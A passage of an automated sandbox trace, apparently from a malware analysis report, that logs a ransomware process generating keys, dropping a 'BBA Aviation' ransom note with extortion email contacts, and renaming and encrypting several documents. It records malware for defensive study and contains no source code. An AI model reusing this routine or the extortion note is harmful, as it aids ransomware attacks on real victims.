CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0215.829] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x16eda [0215.829] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16eda) returned 0x5f0000 [0215.829] CloseHandle (hObject=0x290) returned 1 [0215.837] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0215.838] CloseHandle (hObject=0x280) returned 1 [0215.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0215.838] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0215.838] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0215.838] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0215.839] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a60a8) returned 1 [0215.839] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0215.839] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0215.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0215.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0215.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.852] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IGk+yUBqd8BtEl2u8BS/cgem+ZGTa5YlF6zbH0o1QhpH5a1Z4xLA5YI7EBUbo85R\r\n2aR+fSd+d5zX6ELjBbDZnvE7NjIm4MvcabLLNzbLvfMClFq9T98GK4E0mC/rl7bd\r\n6a4JU/36cATes63ym33LBrCyv8IxyWcmMMH+kPuers8iA05Iw8uI2mOescoziUV2\r\n/FTjrjqMrFprBRAxrKgjzGU/5IprdduUZTP+6IV1AEMEFEF/b0Jc9yPjgFvcedsY\r\nQgpKgps5EFqlVsqGGS1otjgEHQN4BHKs9+az4HPmaualeP19wcZXBwcPojKmWI+M\r\nY1DphDzcsCgdPGqVSTehBQWaQ3k3YHSvsM+U3H5T9riv0/aFUzvb7zWd2O6mJIzU\r\nYAumVhpIcqTsZBnIw7RUAQhaF+A5IVmhPNCJf3hPqWSBGz8gOQ539qzHvfeixN8D\r\nT7mh+qnqbO+LdCIvlkYAd9K0dUXnUb4uCvCaPYPYcKgY0e/omyNw3ams9PRK1CCo\r\nylxAZSCOzSuZl04hm8lgVSIVIhmwcASt7IWNe8Gb7xEYPl+yDZS5IwiANjGRZkwN\r\nl+MeCNQDevy6KcsaNZwsez3BQoFfobZaCK9Z6rkGp3Lcj7uBYiml6DNAcJxZiEM0\r\n8CN5i3Vp0/Nz7o3n406jQDYdNjsslSL54WwgXI2GRTe=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0215.852] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0215.852] SetEndOfFile (hFile=0x28c) returned 1 [0215.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.855] CloseHandle (hObject=0x28c) returned 1 [0216.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0216.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1078 | out: hHeap=0x660000) returned 1 [0216.021] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a69b0) returned 1 [0216.021] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0216.021] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0216.021] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\lHo7xWMr0pNW-BrSYr.pptx") returned 71 [0216.021] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x298) returned 0x6aecf0 [0216.021] lstrcpyW (in: lpString1=0x6aed7e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.022] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0216.022] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.022] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0216.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\lHo7xWMr0pNW-BrSYr.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lho7xwmr0pnw-brsyr.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0216.023] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.024] SetEndOfFile (hFile=0x28c) returned 1 [0216.025] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.025] lstrcpyW (in: lpString1=0x6aed7e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\lHo7xWMr0pNW-BrSYr.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lho7xwmr0pnw-brsyr.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\lHo7xWMr0pNW-BrSYr.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lho7xwmr0pnw-brsyr.pptx.bbawasted")) returned 1 [0216.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\lHo7xWMr0pNW-BrSYr.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lho7xwmr0pnw-brsyr.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0216.026] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0216.026] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xb16d [0216.026] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb16d) returned 0x5f0000 [0216.026] CloseHandle (hObject=0x294) returned 1 [0216.030] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.031] CloseHandle (hObject=0x290) returned 1 [0216.031] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0216.031] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a63d8) returned 1 [0216.031] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0216.031] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0216.032] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0216.032] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0216.032] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0216.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0216.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.041] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PcRTtT1wdeCU+eT/XOaQES8PsTv34I/z0ypQcDu3wNnmQnMr2FM1wV/PDQK07NGG\r\nem5h2OIImjVAeIwI+4x/IcNSoBSkiurrcVeyw94cI8Gp9L9te9+tUKyH9lmNPzKb\r\nQ+izYtlVjiaFxSxRwcSzflmay80zQDfGGZQ9fGfLoP4ig6alujQRY0Zpm8ZFuO1z\r\nWIz6iawZ6HTLjGtGPercHIu7Gsti537yg8KTBlwKMmIpu8O4vsy5zrlan4Tpg0gl\r\nUNUGozIVVi3+eWunG11VDHYu3LKfbnRndQIbOwDQXg/Ts6ek+BLhJtBJDMwJGSwq\r\nalpMnKAhkuvglduXiTSyKlwS6BJYrfyN1PfRPF54grLTnoseA4WTyWmQ+AG3S/km\r\nloDKRJfTYDeYtGvEYd4dCoF8NjrQEMNMFs/3VJ6UjWzjSvUlElut3JGpAs/0q21U\r\nU32iEy2si/VRsjEqmDiGr5rDC2OfbphJR1YbNV3QC0LYUkQVOFxlHPMtrubRTtZ9\r\njXJui6yGrRltV2kvV2Zxsyypr2I1b2OihMkCOmRJNDyPo/7n2Jp+Gm1UM8+G93er\r\nxrTxGudDBt8QhoDKwjfZ5VTvre0xM6St7rzr+2uHvoXs7V57dHzd6Pd2tZaZMSGs\r\nVDUM9NMq+OVxxAY614P7VUE9Wg88w8e6diVYlB8cMfU=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.041] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0216.041] SetEndOfFile (hFile=0x28c) returned 1 [0216.044] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.044] CloseHandle (hObject=0x28c) returned 1 [0216.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0216.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b63f0 | out: hHeap=0x660000) returned 1 [0216.048] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0216.049] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0216.049] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0216.049] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\LyOD95ME.doc") returned 60 [0216.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0216.050] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.050] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0216.050] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.050] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0216.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\LyOD95ME.doc.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lyod95me.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0216.052] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.053] SetEndOfFile (hFile=0x28c) returned 1 [0216.053] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.054] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\LyOD95ME.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lyod95me.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\LyOD95ME.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lyod95me.doc.bbawasted")) returned 1 [0216.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\LyOD95ME.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\lyod95me.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0216.055] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0216.055] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xae3f [0216.055] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xae3f) returned 0x5f0000 [0216.056] CloseHandle (hObject=0x290) returned 1 [0216.326] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.326] CloseHandle (hObject=0x294) returned 1 [0216.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0216.327] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0216.327] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0216.327] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0216.328] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0216.328] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0216.328] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0216.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0216.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.340] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lT5DEZZ455kWzXK+vQl0BAbDnrn4OvuXIAAOB2ZpCzRXqf/L8G/+BRyhTry3ixil\r\nVYwNzyruRxLSbFk8c7yvsX0LZDfzmNFTtqQx5ERnE8tJXxIqGkZ3iSSP6QTzW6mN\r\n0soExmdNhyhikhgnsZXbeMzyR8NRXLYvQ/Fl9uhfLlgfHq3wkogTHy/q2/5n+6NA\r\nEBoiQH+bYIbxQVB/nFHMr04FGI3x1Yutvc2aYaKpb9wxVAN+q81Agy9c6oLUJuJa\r\nZ0QxA/sfmOKX2Ai9LDgAfuf5yvkzinsccmKdS5UAqtAbgvZA3ro9YVVkBW29PJvX\r\n6Y/r8/cOM4+lTa57rVzviE8DJwOQzeg9RlSa3vrvRxzHQfte+0fhNEaSZ0FpXI1f\r\ncIq+bnuApvqd6KcAfrrYnpUHaQTDBdErEM+yth3q9b6xuO5sWxlhb19Y7pElCBpK\r\nWm6efE45YyvgKHSl1zYFmoscQ59T41XQp2f6rsaV3YYeWiTc0mLtspwjsWv8Hvgz\r\n5yZM6MlXQ6olcmaDqtoFQTk4a73XSXIFTaUzLl5TJQ3F4rG41KuXiixLqukJakyB\r\nDFxoTIUKT1g5flkKI8C3W1LTemdYXEuMNOLDPx5uDDAyT5eZ6KCpfISEK11MqeMj\r\nb7WFVcFkn4U3mt+qrgmyXxtVObX8W+Wp34htSWmvl8G=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.340] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0216.340] SetEndOfFile (hFile=0x28c) returned 1 [0216.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.343] CloseHandle (hObject=0x28c) returned 1 [0216.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0216.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7ba0 | out: hHeap=0x660000) returned 1 [0216.348] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0216.349] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0216.349] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0216.349] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\VHVkF1hNudZq2m.xls") returned 66 [0216.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28e) returned 0x6aecf0 [0216.349] lstrcpyW (in: lpString1=0x6aed74, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.350] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a63d8) returned 1 [0216.350] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.350] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0216.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\VHVkF1hNudZq2m.xls.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\vhvkf1hnudzq2m.xls.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0216.351] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.352] SetEndOfFile (hFile=0x28c) returned 1 [0216.353] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.353] lstrcpyW (in: lpString1=0x6aed74, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\VHVkF1hNudZq2m.xls" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\vhvkf1hnudzq2m.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\VHVkF1hNudZq2m.xls.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\vhvkf1hnudzq2m.xls.bbawasted")) returned 1 [0216.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\VHVkF1hNudZq2m.xls.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\vhvkf1hnudzq2m.xls.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0216.358] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0216.358] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x4ded [0216.358] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4ded) returned 0x5f0000 [0216.358] CloseHandle (hObject=0x294) returned 1 [0216.359] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.360] CloseHandle (hObject=0x290) returned 1 [0216.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0216.360] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0216.361] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0216.361] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0216.361] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0216.361] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0216.361] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0216.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0216.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.780] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, 